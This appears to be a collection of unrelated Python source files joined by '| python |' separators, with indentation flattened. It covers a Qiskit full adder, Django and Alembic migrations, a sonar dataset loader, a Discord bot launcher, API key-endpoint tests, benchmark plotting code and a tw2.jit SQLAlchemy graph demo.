"lightgrey" :(192,192,192),
}
def buildPalette(cols, order, topleft=(0,0), size=32):
buttons = {}
links = {}
pos = topleft
i=0
# Interesting/neat trick MPS
for col in order:
buttons[col] = Button(caption="", position=pos, size=(size,size), bgcolour=cols[col], msg=cols[col])
links[ (col,"outbox") ] = ("self","outbox")
pos = (pos[0] + size, pos[1])
i=i+1
return Graphline( linkages = links, **buttons )
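# Usage sketch (illustrative, not in the original file): build a strip of all
# ten swatches; each button sends its (r, g, b) msg out of the Graphline's
# "outbox" when clicked.
#     palette = buildPalette(colours,
#                            order=("black", "red", "orange", "yellow", "green",
#                                   "turquoise", "blue", "purple", "darkgrey",
#                                   "lightgrey"),
#                            topleft=(10, 10), size=32)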
| python |
#!/usr/bin/env python
from qiskit import QuantumProgram
Circuit = 'oneBitFullAdderCircuit'
# Create the quantum program
qp = QuantumProgram()
# Creating registers
n_qubits = 5
qr = qp.create_quantum_register("qr", n_qubits)
cr = qp.create_classical_register("cr", n_qubits)
# One-bit full adder circuit, where:
# qr[0], qr[1] are the bits to add
# qr[2] is the carry_in
# qr[3] is the result
# qr[4] is the carry_out
obc = qp.create_circuit(Circuit, [qr], [cr])
# Prepare bits to add
obc.h(qr[0])
obc.h(qr[1])
obc.h(qr[2])
# The result in qr[3]
obc.cx(qr[0], qr[3])
obc.cx(qr[1], qr[3])
obc.cx(qr[2], qr[3])
# The carry_out in qr[4]
obc.ccx(qr[0], qr[1], qr[4])
obc.ccx(qr[0], qr[2], qr[4])
obc.ccx(qr[1], qr[2], qr[4])
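# Why this works: after the three CX gates, qr[3] holds a XOR b XOR carry_in,
# which is exactly the sum bit. The three CCX (Toffoli) gates XOR the pairwise
# ANDs (a&b, a&cin, b&cin) into qr[4]; for three bits that XOR equals the
# majority function, which is the carry-out. The controls qr[0..2] are never
# modified by any of these gates, so the ordering above is safe.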
# Measure
for i in range(0, n_qubits):
obc.measure(qr[i], cr[i])
# Get qasm source
source = qp.get_qasm(Circuit)
print(source)
# Compile and run
backend = 'local_qasm_simulator'
circuits = [Circuit] # Group of circuits to execute
qobj = qp.compile(circuits, backend) # Compile your program
result = qp.run(qobj, wait=2, timeout=240)
print(result)
print(result.get_counts(Circuit))
| python |
"""add degree denormalizations
Revision ID: 38c7982f4160
Revises: 59d7b4f94cdf
Create Date: 2014-09-11 20:32:37.987989
"""
# revision identifiers, used by Alembic.
revision = '38c7982f4160'
down_revision = '59d7b4f94cdf'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column(u'grano_entity', sa.Column('degree_in', sa.Integer(), nullable=True))
op.add_column(u'grano_entity', sa.Column('degree_out', sa.Integer(), nullable=True))
op.add_column(u'grano_entity', sa.Column('degree', sa.Integer(), nullable=True))
def downgrade():
op.drop_column(u'grano_entity', 'degree_out')
op.drop_column(u'grano_entity', 'degree_in')
op.drop_column(u'grano_entity', 'degree')
| python |
from protodata.serialization_ops import SerializeSettings
from protodata.reading_ops import DataSettings
from protodata.utils import create_dir
from protodata.data_ops import NumericColumn, split_data, feature_normalize, \
map_feature_type, float64_feature, int64_feature
import tensorflow as tf
import pandas as pd
import numpy as np
import os
import logging
from six.moves import urllib
DATA_FILE_NAME = 'sonar.npy'
DATA_URL = 'https://archive.ics.uci.edu/ml/machine-learning-databases/undocumented/connectionist-bench/sonar/sonar.all-data' # noqa
logger = logging.getLogger(__name__)
class SonarSerialize(SerializeSettings):
def __init__(self, data_path):
""" See base class """
super(SonarSerialize, self).__init__(data_path)
create_dir(data_path)
# On-demand download if it does not exist
if not is_downloaded(data_path):
logger.info('Downloading Sonar dataset ...')
urllib.request.urlretrieve(DATA_URL, get_data_path(data_path))
def read(self):
self.data = pd.read_csv(get_data_path(self.data_path), header=None)
self.features = self.data.loc[:, self.data.columns.values[:-1]]
self.labels = self.data.loc[:, self.data.columns.values[-1]]
# Map rock (R) to 0 and mine (M) to 1
self.labels[self.labels == 'M'] = 1
self.labels[self.labels == 'R'] = 0
def get_validation_indices(self, train_ratio, val_ratio):
""" Separates data into training, validation and test and normalizes
the columns by using z-scores """
train, val, test = split_data(self.features.shape[0],
train_ratio,
val_ratio)
# Store normalization info
self.feature_norm = self._normalize_features(train, val)
return train, val, test
def _normalize_features(self, train_idx, val_idx):
training = np.concatenate([train_idx, val_idx])
mean_c, std_c, min_c, max_c = \
feature_normalize(self.features.iloc[training, :])
self.features = (self.features - mean_c) / std_c
# Store normalization info
        return {'mean': mean_c, 'std': std_c, 'min': min_c, 'max': max_c}
def get_options(self):
options = {'feature_normalization': self.feature_norm}
return options
def define_columns(self):
cols = []
# Columns
for i in range(self.features.shape[1]):
current_col = NumericColumn(
name=str(i), type=map_feature_type(np.dtype('float'))
)
cols.append(current_col)
# Label
cols.append(NumericColumn(
name='class', type=map_feature_type(np.dtype('int'))
))
return cols
def build_examples(self, index):
row = self.features.iloc[index, :]
feature_dict = {}
for i in range(self.features.shape[1]):
feature_dict.update(
{str(i): float64_feature(row.iloc[i])}
)
class_value = int(self.labels.iloc[index])
feature_dict.update({'class': int64_feature(class_value)})
return [tf.train.Example(features=tf.train.Features(feature=feature_dict))] # noqa
class SonarSettings(DataSettings):
def __init__(self, dataset_location, image_specs=None,
embedding_dimensions=32, quantizer=None):
super(SonarSettings, self).__init__(
dataset_location=dataset_location,
image_specs=image_specs,
embedding_dimensions=embedding_dimensions,
quantizer=quantizer)
def tag(self):
return 'sonar'
def size_per_instance(self):
return 0.5
def target_class(self):
return 'class'
def _target_type(self):
return tf.int32
def _get_num_classes(self):
return 2
def select_wide_cols(self):
return [v.to_column() for k, v in self.columns.items()]
def select_deep_cols(self):
        raise RuntimeError('No embeddings in this dataset')
def is_downloaded(folder):
""" Returns whether data has been downloaded """
return os.path.isfile(get_data_path(folder))
def get_data_path(folder):
return os.path.join(folder, DATA_FILE_NAME)
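# Usage sketch (an assumption about the surrounding protodata workflow, not
# part of this file):
#     serializer = SonarSerialize('/tmp/sonar')   # downloads on first use
#     serializer.read()
#     settings = SonarSettings(dataset_location='/tmp/sonar')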
| python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""argparse and main entry point script"""
import argparse
import logging
import os
import sys
from logging.handlers import TimedRotatingFileHandler
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import kootkounter.bot
LOG_LEVEL_STRINGS = ["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG"]
def log_level(log_level_string: str):
"""Argparse type function for determining the specified logging level"""
if log_level_string not in LOG_LEVEL_STRINGS:
raise argparse.ArgumentTypeError(
"invalid choice: {} (choose from {})".format(
log_level_string,
LOG_LEVEL_STRINGS
)
)
return getattr(logging, log_level_string, logging.INFO)
def add_log_parser(parser):
"""Add logging options to the argument parser"""
group = parser.add_argument_group(title="Logging")
group.add_argument("--log-level", dest="log_level", default="INFO",
type=log_level, help="Set the logging output level")
group.add_argument("--log-dir", dest="log_dir",
help="Enable TimeRotatingLogging at the directory "
"specified")
group.add_argument("-v", "--verbose", action="store_true",
help="Enable verbose logging")
def init_logging(args, log_file_path):
"""Intake a argparse.parse_args() object and setup python logging"""
# configure logging
handlers_ = []
log_format = logging.Formatter(fmt="[%(asctime)s] [%(levelname)s] - %(message)s")
if args.log_dir:
os.makedirs(args.log_dir, exist_ok=True)
file_handler = TimedRotatingFileHandler(
os.path.join(args.log_dir, log_file_path),
when="d", interval=1, backupCount=7, encoding="UTF-8",
)
file_handler.setFormatter(log_format)
file_handler.setLevel(args.log_level)
handlers_.append(file_handler)
if args.verbose:
stream_handler = logging.StreamHandler(stream=sys.stderr)
stream_handler.setFormatter(log_format)
stream_handler.setLevel(args.log_level)
handlers_.append(stream_handler)
logging.basicConfig(
handlers=handlers_,
level=args.log_level
)
def get_parser() -> argparse.ArgumentParser:
"""Create and return the argparse"""
parser = argparse.ArgumentParser(
description="Start the kootkounter Discord bot",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument("-tf", "--token-file", dest="token_file",
required=True,
help="Path to file containing the Discord token for "
"the bot")
parser.add_argument("-d", "--database", dest="database",
default="degeneracy.db",
help="Path to the SQLITE database to store state")
add_log_parser(parser)
return parser
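# Example invocation (a sketch; assumes the package exposes this module as an
# entry point):
#     python -m kootkounter --token-file token.txt -d degeneracy.db -v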
def main() -> int:
"""main entry point"""
parser = get_parser()
args = parser.parse_args()
init_logging(args, "koolkounter.log")
with open(args.token_file, "r") as f:
token = f.read().strip()
engine = create_engine('sqlite:///{}'.format(args.database))
kootkounter.bot.BASE.metadata.create_all(engine)
kootkounter.bot.DB = sessionmaker(bind=engine)()
kootkounter.bot.BOT.run(token)
return 0
if __name__ == "__main__":
sys.exit(main())
| python |
import sys
from pathlib import Path
# Path modifications
paths = ["../build/src", "../src/preproc", "../src/util"]
for item in paths:
addPath = Path(__file__).parent / item
sys.path.append(str(addPath.resolve()))
#-----------------------------------------------------------------------------#
import util_yaml
yamlDict = util_yaml.load(sys.argv[1])
yamlDict = util_yaml.process(yamlDict)
breakpoint() | python |
import os
import yaml
def root():
mydir = os.path.dirname(os.path.realpath(__file__))
return os.path.dirname(mydir)
def tla_result_fixture(zone_number, score=0):
return {
'score': score,
'present': True,
'disqualified': False,
'zone': zone_number,
}
def get_data(data_root, input_name):
input_file = os.path.join(root(), data_root, input_name)
output_file = os.path.join(root(), data_root, input_name[:-5] + '.out.yaml')
if not os.path.exists(output_file):
raise ValueError(
"Missing output expectation '{1}' for input '{0}'.".format(
input_name,
output_file,
),
)
with open(output_file) as f:
        expected_output = yaml.safe_load(f)
return input_file, expected_output
def get_input_files(data_root):
files = os.listdir(os.path.join(root(), data_root))
outputs = [f for f in files if f.endswith('.out.yaml')]
inputs = [f for f in files if f.endswith('.yaml') and f not in outputs]
return inputs
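# Fixture layout sketch (the concrete paths are assumptions): every
# '<case>.yaml' input under data_root is paired with a '<case>.out.yaml'
# expectation, e.g.
#     data/scores/basic.yaml  ->  data/scores/basic.out.yaml
# get_input_files() lists only the inputs; get_data() resolves each pair.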
| python |
from django.urls import include, path, re_path
from . import handlers
article_urlpatterns = [
path("2020/", handlers.handler_2020, name="articles-2020"),
path(
"categories/",
include(
[
path("<str:category>", handlers.category, name="categories"),
path(
"<str:category>/newest/", handlers.newest, name="newest-in-category"
),
]
),
),
path("<int:year>/", handlers.year_handler, name="articles-year"),
path("<int:year>/<int:month>/", handlers.month_handler, name="articles-year-month"),
path("<int:year>/popular/", handlers.month_handler, name="articles-year-month"),
path(
"<int:year>/<int:month>/<int:day>/",
handlers.popular_articles,
name="popular-articles",
),
]
user_urlpatterns = [path("extra/", handlers.home_handler, name="users-extra")]
urlpatterns = [
path("", handlers.home_handler, name="home"),
path(
"articles/",
include(article_urlpatterns),
),
path("users/", include(user_urlpatterns)),
re_path("^[a-z]*$", handlers.catchall, name="catchall"),
path("int/<int:id>", handlers.home_handler, name="int"),
]
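# Resolution sketch (illustrative, not part of the fixture): with these
# patterns loaded as the ROOT_URLCONF,
#     reverse("newest-in-category", kwargs={"category": "tech"})
#     # -> "/articles/categories/tech/newest/"
#     reverse("articles-year-month", kwargs={"year": 2020, "month": 5})
#     # -> "/articles/2020/5/"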
| python |
import base64
import os
from io import BytesIO
from PIL import Image
from rest_framework import serializers
from photologue.models import Photo, Gallery
from oms_cms.config import settings
from django.conf import settings
BASE_DIR = settings.BASE_DIR
class ImageSerializerField(serializers.Field):
def to_representation(self, value):
outputPath = self.to_internal_value(value)
return outputPath
def to_internal_value(self, value):
f = value.split("/").pop().split(".").pop(1)
if f == "jpeg" or f == "jpg" or f == "webp":
way = "tmp/img{}.j2p".format(value.split("/").pop().split(".").pop(0))
            outputPath = os.path.join(settings.MEDIA_ROOT, way)
# quality = 50
try:
Image.open(settings.MEDIA_ROOT + "/" + way)
except:
im = Image.open(BASE_DIR + value[value.rfind('/media'):])
im.save(outputPath, 'JPEG', optimize=True, quality=60)
path = settings.MEDIA_URL[:settings.MEDIA_URL.find('media')] + outputPath[outputPath.rfind('media'):]
return path
else:
return value
class PhotoSerializer(serializers.ModelSerializer):
"""Photo"""
# image = serializers.ImageField(max_length=None, use_url=True, allow_null=True, required=False)
# image = serializers.ImageField('image.url')
# image = serializers.SerializerMethodField('get_thumbnail_url')
image = serializers.URLField(read_only=True, source='image.url')
image_alt = ImageSerializerField(read_only=True, source='image.url')
# def get_thumbnail_url(self, obj):
# return '%s%s' % (settings.MEDIA_URL, obj.get_absolute_url)
class Meta:
model = Photo
fields = ("id", "image", "image_alt")
class GallerySerializer(serializers.ModelSerializer):
"""Photo"""
photos = PhotoSerializer(many=True, read_only=True)
class Meta:
model = Gallery
fields = ("id", "title", "description", "photos", 'slug')
| python |
# vim: set expandtab shiftwidth=4 :
# pylint: disable=missing-docstring
import json
import requests
from . import base
from . import settings
class KeysSymmTest(base.BaseTest):
user = settings.EXISTING_USERS[1]
wrong_user = settings.EXISTING_USERS[2]
def make_put_body(self):
return {
'loginKey': self.user['loginKey'],
'privateDataKey': self.user['privateDataKey'],
}
def get_symm_keys(self, auth=None):
if auth is None:
auth = self.auth_good()
return requests.get(
self.url_prefix(self.user) + '/keys/symm',
headers={'content-type': 'application/json'},
**auth)
def put_symm_keys(self, body, auth=None):
if auth is None:
auth = self.auth_good()
return requests.put(
self.url_prefix(self.user) + '/keys/symm',
headers={'content-type': 'application/json'},
data=json.dumps(body),
**auth)
def test_get_bad_auth(self):
resp = self.get_symm_keys(self.auth_wrong_user())
self.assertEqual(resp.status_code, requests.codes.unauthorized)
resp = self.get_symm_keys(self.auth_nonexisting_user())
self.assertEqual(resp.status_code, requests.codes.unauthorized)
resp = self.get_symm_keys(self.auth_bad_login_key())
self.assertEqual(resp.status_code, requests.codes.unauthorized)
def test_get_success(self):
resp = self.get_symm_keys()
self.assertEqual(resp.status_code, requests.codes.ok)
resp_body = json.loads(resp.text)
        self.assertNotIn('loginKey', resp_body)
        self.assertIn('privateDataKey', resp_body)
self.assertEqual(resp_body['privateDataKey'], self.user['privateDataKey'])
def test_put_bad_login_key_format(self):
# missing loginKey
body = self.make_put_body()
del body['loginKey']
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# loginKey too short
body = self.make_put_body()
body['loginKey'] = body['loginKey'][:-1]
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# loginKey too long
body = self.make_put_body()
body['loginKey'] += '0'
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# bad char
body = self.make_put_body()
body['loginKey'] = body['loginKey'][:-1] + 'x'
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# wrong case
body = self.make_put_body()
body['loginKey'] = body['loginKey'][:-1] + 'A'
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
def test_put_bad_private_data_key_format(self):
# missing privateDataKey
body = self.make_put_body()
del body['privateDataKey']
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# privateDataKey too short
body = self.make_put_body()
body['privateDataKey'] = "A" * 43
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# privateDataKey too long
body = self.make_put_body()
body['privateDataKey'] = "A" * 201
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# bad char
body = self.make_put_body()
body['privateDataKey'] = body['privateDataKey'][:-1] + '%'
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
def test_put_success(self):
original_auth = self.auth_good()
original_login_key = self.user['loginKey']
original_private_data_key = self.user['privateDataKey']
# switch to new loginKey
self.user['loginKey'] = "fedcba9876543210" * 8
self.user['privateDataKey'] = "asdf" * 20
body = self.make_put_body()
resp = self.put_symm_keys(body, original_auth)
self.assertEqual(resp.status_code, requests.codes.ok)
# check changed privateDataKey
self.test_get_success()
# switch back to old loginKey
new_auth = self.auth_good()
self.user['loginKey'] = original_login_key
self.user['privateDataKey'] = original_private_data_key
body = self.make_put_body()
resp = self.put_symm_keys(body, new_auth)
self.assertEqual(resp.status_code, requests.codes.ok)
# check original privateDataKey
self.test_get_success()
| python |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""Generate ERT vs param. figures.
The figures will show the performance in terms of ERT on a log scale
w.r.t. parameter. On the y-axis, data is represented as
a number of function evaluations. Crosses (+) give the median number of
function evaluations for the smallest reached target function value
(also divided by dimension). Crosses (×) give the average number of
overall conducted function evaluations in case the smallest target
function value (1e-8) was not reached.
"""
from __future__ import absolute_import
import os
import matplotlib.pyplot as plt
import numpy as np
from . import toolsstats, testbedsettings, genericsettings, toolsdivers
from .ppfig import save_figure, getFontSize
__all__ = ['beautify', 'plot', 'read_fun_infos', 'main']
avgstyle = dict(color='r', marker='x', markersize=20)
medmarker = dict(linestyle='', marker='+', markersize=30, markeredgewidth=5,
zorder=-1)
colors = ('k', 'b', 'c', 'g', 'y', 'm', 'r', 'k', 'k', 'c', 'r', 'm') # sort of rainbow style
styles = [{'color': 'k', 'marker': 'o', 'markeredgecolor': 'k'},
{'color': 'b'},
{'color': 'c', 'marker': 'v', 'markeredgecolor': 'c'},
{'color': 'g'},
{'color': 'y', 'marker': '^', 'markeredgecolor': 'y'},
{'color': 'm'},
{'color': 'r', 'marker': 's', 'markeredgecolor': 'r'}] # sort of rainbow style
refcolor = 'wheat'
# should correspond with the colors in pprldistr.
# Get benchmark short infos, prepended with the function id.
def read_fun_infos():
funInfos = {}
for id in testbedsettings.current_testbed.short_names:
funInfos[int(id)] = str(id) + ' ' + testbedsettings.current_testbed.short_names[id]
return funInfos
def beautify():
"""Customize figure presentation."""
# Input checking
# Get axis handle and set scale for each axis
axisHandle = plt.gca()
axisHandle.set_xscale("log")
axisHandle.set_yscale("log")
# Grid options
axisHandle.grid(True)
ymin, ymax = plt.ylim()
xmin, xmax = plt.xlim()
# quadratic and cubic "grid"
#plt.plot((2,200), (1, 1e2), 'k:')
#plt.plot((2,200), (1, 1e4), 'k:')
#plt.plot((2,200), (1e3, 1e5), 'k:')
#plt.plot((2,200), (1e3, 1e7), 'k:')
#plt.plot((2,200), (1e6, 1e8), 'k:')
#plt.plot((2,200), (1e6, 1e10), 'k:')
# axes limits
plt.ylim(10**-0.2, ymax) # Set back the previous maximum.
# ticks on axes
# axisHandle.invert_xaxis()
# plt.xlim(1.8, 45) # TODO should become input arg?
# dimticklist = (2, 3, 4, 5, 10, 20, 40) # TODO: should become input arg at some point?
# dimannlist = (2, 3, '', 5, 10, 20, 40) # TODO: should become input arg at some point?
# TODO: All these should depend on one given input (xlim, ylim)
# axisHandle.set_xticks(dimticklist)
# axisHandle.set_xticklabels([str(n) for n in dimannlist])
tmp = axisHandle.get_yticks()
tmp2 = []
for i in tmp:
tmp2.append('%d' % round(np.log10(i)))
axisHandle.set_yticklabels(tmp2)
plt.ylabel('Run Lengths')
def plot(dsList, param='dim', targets=(10., 1., 1e-1, 1e-2, 1e-3, 1e-5, 1e-8)):
"""Generate plot of ERT vs param."""
dictparam = dsList.dictByParam(param)
params = sorted(dictparam) # sorted because we draw lines
# generate plot from dsList
res = []
# collect data
rawdata = {}
for p in params:
assert len(dictparam[p]) == 1
rawdata[p] = dictparam[p][0].detEvals(targets)
# expect dictparam[p] to have only one element
# plot lines for ERT
xpltdata = params
for i, t in enumerate(targets):
ypltdata = []
for p in params:
data = rawdata[p][i]
unsucc = np.isnan(data)
assert len(dictparam[p]) == 1
data[unsucc] = dictparam[p][0].maxevals
# compute ERT
ert, srate, succ = toolsstats.sp(data, issuccessful=(unsucc == False))
ypltdata.append(ert)
res.extend(plt.plot(xpltdata, ypltdata, markersize=20,
zorder=len(targets) - i, **styles[i]))
# for the legend
plt.plot([], [], markersize=10,
label=' %+d' % (np.log10(targets[i])),
**styles[i])
# plot median of successful runs for hardest target with a success
for p in params:
for i, t in enumerate(reversed(targets)): # targets has to be from hardest to easiest
data = rawdata[p][i]
data = data[np.isnan(data) == False]
if len(data) > 0:
median = toolsstats.prctile(data, 50.)[0]
res.extend(plt.plot(p, median, styles[i]['color'], **medmarker))
break
# plot average number of function evaluations for the hardest target
xpltdata = []
ypltdata = []
for p in params:
data = rawdata[p][0] # first target
xpltdata.append(p)
if (np.isnan(data) == False).all():
tmpdata = data.copy()
assert len(dictparam[p]) == 1
tmpdata[np.isnan(data)] = dictparam[p][0].maxevals[np.isnan(data)]
tmp = np.mean(tmpdata)
else:
tmp = np.nan # Check what happens when plotting NaN
ypltdata.append(tmp)
res.extend(plt.plot(xpltdata, ypltdata, **avgstyle))
# display numbers of successes for hardest target where there is still one success
for p in params:
for i, t in enumerate(targets): # targets has to be from hardest to easiest
data = rawdata[p][i]
unsucc = np.isnan(data)
assert len(dictparam[p]) == 1
data[unsucc] = dictparam[p][0].maxevals
# compute ERT
ert, srate, succ = toolsstats.sp(data, issuccessful=(unsucc == False))
if srate == 1.:
break
elif succ > 0:
res.append(plt.text(p, ert * 1.85, "%d" % succ, axes=plt.gca(),
horizontalalignment="center",
verticalalignment="bottom"))
break
return res
def main(dsList, _targets=(10., 1., 1e-1, 1e-2, 1e-3, 1e-5, 1e-8),
param=('dim', 'Dimension'), is_normalized=True, outputdir='.'):
"""Generates figure of ERT vs. param.
This script will generate as many figures as there are functions.
For a given function and a given parameter value there should be
only **one** data set.
Crosses (+) give the median number of function evaluations of
successful trials for the smallest reached target function value.
Crosses (x) give the average number of overall conducted function
evaluations in case the smallest target function value (1e-8) was
not reached.
:keyword DataSetList dsList: data sets
:keyword seq _targets: target precisions
:keyword tuple param: parameter on x-axis. The first element has to
be a string corresponding to the name of an
attribute common to elements of dsList. The
second element has to be a string which will
be used as label for the figures. The values
of attribute param have to be sortable.
:keyword bool is_normalized: if True the y values are normalized by
x values
:keyword string outputdir: name of output directory for the image
files
"""
funInfos = read_fun_infos()
# TODO check input parameter param
for func, dictfunc in dsList.dictByFunc().items():
filename = os.path.join(outputdir,'ppfigparam_%s_f%03d' % (param[0], func))
try:
targets = list(j[func] for j in _targets)
except TypeError:
targets = _targets
targets = sorted(targets) # from hard to easy
handles = plot(dictfunc, param[0], targets)
# # display best algorithm
# if not bestalg.bestAlgorithmEntries:
# bestalg.load_reference_algorithm()
# bestalgdata = []
# for d in dimsBBOB:
# entry = bestalg.bestAlgorithmEntries[(d, func)]
# tmp = entry.detERT([1e-8])[0]
# if not np.isinf(tmp):
# bestalgdata.append(tmp/d)
# else:
# bestalgdata.append(None)
# plt.plot(dimsBBOB, bestalgdata, color=refcolor, linewidth=10, zorder=-2)
# plt.plot(dimsBBOB, bestalgdata, ls='', marker='d', markersize=25,
# color=refcolor, markeredgecolor=refcolor, zorder=-2)
a = plt.gca()
if is_normalized:
for i in handles:
try:
plt.setp(i, 'ydata', plt.getp(i, 'ydata') / plt.getp(i, 'xdata'))
except TypeError:
pass
a.relim()
a.autoscale_view()
beautify()
plt.xlabel(param[1])
if is_normalized:
plt.setp(plt.gca(), 'ylabel', plt.getp(a, 'ylabel') + ' / ' + param[1])
if func in testbedsettings.current_testbed.functions_with_legend:
toolsdivers.legend(loc="best")
fontSize = getFontSize(funInfos.values())
if func in funInfos.keys():
a.set_title(funInfos[func], fontsize=fontSize)
save_figure(filename, dsList[0].algId)
plt.close()
| python |
# Generated by Django 2.1.5 on 2019-02-18 12:48
from django.db import migrations, models
def change_negative_fields(apps, schema_editor):
Resource = apps.get_model('resources', 'Resource')
for resource in Resource.objects.all():
resource_has_changed = False
if resource.area and resource.area < 0:
resource.area = 0
resource_has_changed = True
if resource.max_reservations_per_user and resource.max_reservations_per_user < 0:
resource.max_reservations_per_user = 0
resource_has_changed = True
if resource.people_capacity and resource.people_capacity < 0:
resource.people_capacity = 0
resource_has_changed = True
if resource_has_changed:
resource.save()
class Migration(migrations.Migration):
dependencies = [
('resources', '0074_reservation_confirmed_notification_extra_translations'),
]
operations = [
migrations.RunPython(change_negative_fields),
migrations.AlterField(
model_name='resource',
name='area',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Area (m2)'),
),
migrations.AlterField(
model_name='resource',
name='max_reservations_per_user',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Maximum number of active reservations per user'),
),
migrations.AlterField(
model_name='resource',
name='people_capacity',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='People capacity'),
),
]
| python |
""" Samples of how to use tw2.jit
Each class exposed in the widgets submodule has an accompanying Demo<class>
widget here with some parameters filled out.
The demos implemented here are what is displayed in the tw2.devtools
WidgetBrowser.
"""
from tw2.core.resources import JSSymbol
from tw2.jit.widgets import SQLARadialGraph
import transaction
from sqlalchemy import (
Column, Integer, Unicode,
MetaData, Table, ForeignKey,
)
from sqlalchemy.orm import relation, backref
from sqlalchemy.ext.declarative import declarative_base
import tw2.sqla as tws
session = tws.transactional_session()
Base = declarative_base(metadata=MetaData('sqlite:///%s.db' % __name__))
Base.query = session.query_property()
friends_mapping = Table(
'persons_friends_mapping', Base.metadata,
Column('friender_id', Integer,
ForeignKey('persons.id'), primary_key=True),
Column('friendee_id', Integer,
ForeignKey('persons.id'), primary_key=True))
class Person(Base):
__tablename__ = 'persons'
id = Column(Integer, primary_key=True)
first_name = Column(Unicode(255), nullable=False)
last_name = Column(Unicode(255), nullable=False)
some_attribute = Column(Unicode(255), nullable=False)
def __unicode__(self):
return "<img src='%s' /> %s %s" % (
self.gravatar_url(8), self.first_name, self.last_name)
@property
def email(self):
return "%s.%[email protected]" % (self.first_name, self.last_name)
def gravatar_url(self, size=64):
# import code for encoding urls and generating md5 hashes
import urllib
try:
from hashlib import md5
except ImportError:
import md5
md5 = md5.new
# construct the url
gravatar_url = "http://www.gravatar.com/avatar.php?"
gravatar_url += urllib.urlencode({
'gravatar_id': md5(self.email.lower()).hexdigest(),
'size': size, 'd': 'monsterid',
})
return gravatar_url
def __jit_data__(self):
dictator = "This person is not a dictator."
if self.last_name in ["Ben Ali", "Mubarak", "Qaddafi"]:
dictator = "Probably needs to be overthrown."
return {
# This attribute is used to generate hoverover tips
"hover_html" : """
<div>
<h3>person.__jit_data__()['hover_html']</h3>
<img src="%s" />
<p>%s %s with %i friends and %i pets.</p>
<p>%s</p>
</div>
""" % (self.gravatar_url(), self.first_name, self.last_name,
len(self.friends), len(self.pets), dictator),
# This attribute is ultimately just ignored but by
# specifying it here, it is made available clientside
# for any custom js you want to rig up.
"some_attr" : self.some_attribute,
"traversal_costs" : {
# You can set this to 2 to change the way depth
# accumulates during the generation of a json response.
'friends' : 1
}
}
class Pet(Base):
__tablename__ = 'pets'
id = Column(Integer, primary_key=True)
name = Column(Unicode(255), nullable=False)
variety = Column(Unicode(255), nullable=False)
owner_id = Column(Integer, ForeignKey('persons.id'))
owner = relation(
Person, primaryjoin=owner_id==Person.id,
backref=backref('pets'))
def __unicode__(self):
return "%s the %s" % (self.name, self.variety)
def __jit_data__(self):
# TODO -- in the future, let's add other attributes
# like 'click' or some js callbacks
return {
"hover_html" : """
<div>
<h3>pet.__jit_data__()['hover_html']</h3>
<p>This content is specified in the sqlalchemy model.
If you didn't know. This is a Pet object.
It is a %s that goes by the name %s.</p>
<p>You might want to
<a href="http://www.google.com/search?q=%s">
google for its name
</a>, or something.</p>
</div>""" % (self.variety, self.name, self.name),
"traversal_costs" : {
'owner' : 2,
}
}
Person.__mapper__.add_property('friends', relation(
Person,
primaryjoin=Person.id==friends_mapping.c.friendee_id,
secondaryjoin=friends_mapping.c.friender_id==Person.id,
secondary=friends_mapping,
doc="List of this persons' friends!",
))
Base.metadata.create_all()
def populateDB(sess):
if Person.query.count() > 0:
print "Not populating DB. Already stuff in there."
return
import random
firsts = ["Sally", "Suzie", "Sandy",
"John", "Jim", "Joseph"]
lasts = ["Anderson", "Flanderson", "Johnson",
"Frompson", "Qaddafi", "Mubarak", "Ben Ali"]
for first in firsts:
for last in lasts:
p = Person(
first_name=first, last_name=last,
some_attribute="Fun fact #%i" % random.randint(0,255)
)
sess.add(p)
pet_names = ["Spot", "Mack", "Cracker", "Fluffy", "Alabaster",
"Slim Pickins", "Lil' bit", "Balthazaar", "Hadoop"]
varieties = ["dog", "cat", "bird", "fish", "hermit crab", "lizard"]
for person in Person.query.all():
for i in range(random.randint(0,7)):
pet = Pet(name=pet_names[random.randint(0,len(pet_names)-1)],
variety=varieties[random.randint(0,len(varieties)-1)])
sess.add(pet)
person.pets.append(pet)
qaddafis = Person.query.filter_by(last_name='Qaddafi').all()
mubaraks = Person.query.filter_by(last_name='Mubarak').all()
benalis = Person.query.filter_by(last_name='Ben Ali').all()
dictators = qaddafis + mubaraks + benalis
print "populating dictators friends"
for p1 in dictators:
for p2 in dictators:
if p1 == p2 or p1 in p2.friends:
continue
if random.random() > 0.75:
p1.friends.append(p2)
p2.friends.append(p1)
print "populating everyone else's friends"
for p1 in Person.query.all():
for p2 in Person.query.all():
if p1 == p2 or p1 in p2.friends:
continue
if random.random() > 0.95:
p1.friends.append(p2)
p2.friends.append(p1)
print "done populating DB"
populateDB(session)
transaction.commit()
class DemoSQLARadialGraph(SQLARadialGraph):
entities = [Person, Pet]
excluded_columns = ['id', 'owner_id']
# Some initial target
rootObject = Person.query.first()
base_url = '/db_radialgraph_demo/'
background = { 'CanvasStyles':{ 'strokeStyle' : '#C73B0B' } }
backgroundcolor = '#350608'
Node = {
'color' : '#C73B0B',
}
Edge = {
'color': '#F2C545',
'lineWidth':1.5,
}
import tw2.core as twc
mw = twc.core.request_local()['middleware']
mw.controllers.register(DemoSQLARadialGraph, 'db_radialgraph_demo')
| python |
import numpy as np
from matplotlib import pyplot as plt
from neural_network import NeuralNet
def generate_data():
N = 100 # number of points per class
D = 2 # dimensionality
K = 3 # number of classes
X = np.zeros((N * K, D))
